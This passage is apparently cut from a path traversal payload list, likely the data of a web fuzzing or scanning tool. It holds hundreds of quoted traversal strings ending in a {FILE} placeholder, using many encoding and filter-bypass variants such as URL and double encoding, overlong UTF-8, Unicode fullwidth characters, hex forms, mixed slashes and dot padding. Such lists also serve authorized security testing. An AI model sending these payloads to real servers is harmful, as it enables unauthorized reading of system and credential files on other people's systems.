\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%5c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","\\../{FILE}","\\../\\../{FILE}","\\../\\../\\../{FILE}","\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../\\../\\../{FILE}","/..\\{FILE}","/..\\/..\\{FILE}","/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",".../{FILE}",".../.../{FILE}",".../.../.../{FILE}",".../.../.../.../{FILE}",".../.../.../.../.../{FILE}",".../.../.../.../.../.../{FILE}",".../.../.../.../.../.../.../{FILE}",".../.../.../.../.../.../.../.../{FILE}","...\\{FILE}","...\\...\\{FILE}","...\\...\\...\\{FILE}","...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\...\\...\\{FILE}","..../{FILE}","..../..../{FILE}","..../..../..../{FILE}","..../..../..../..../{FILE}","..../..../..../..../..../{FILE}","..../..../..../..../..../..../{FILE}","..../..../..../..../..../..../..../{FILE}","..../..../..../..../..../..../..../..../{FILE}","....\\{FILE}","....\\....\\{FILE}","....\\....\\....\\{FILE}","....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\....\\....\\{FILE}","........................................................................../{FILE}","........................................................................../../{FILE}","........................................................................../../../{FILE}","........................................................................../../../../{FILE}","........................................................................../../../../../{FILE}","........................................................................../../../../../../{FILE}","........................................................................../../../../../../../{FILE}","........................................................................../../../../../../../../{FILE}","..........................................................................\\{FILE}","..........................................................................\\..\\{FILE}","..........................................................................\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%u2215{FILE}","..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","..%u2216{FILE}","..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%uEFC8{FILE}","..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uF025{FILE}","..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","..0x2f{FILE}","..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","..0x5c{FILE}","..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","..%c0%2f{FILE}","..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","..%c0%5c{FILE}","..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","///%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","\\\\\\%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..\\\\{FILE}","..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\\\{FILE}","..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","./\\/./{FILE}","./\\/././\\/./{FILE}","./\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",".\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\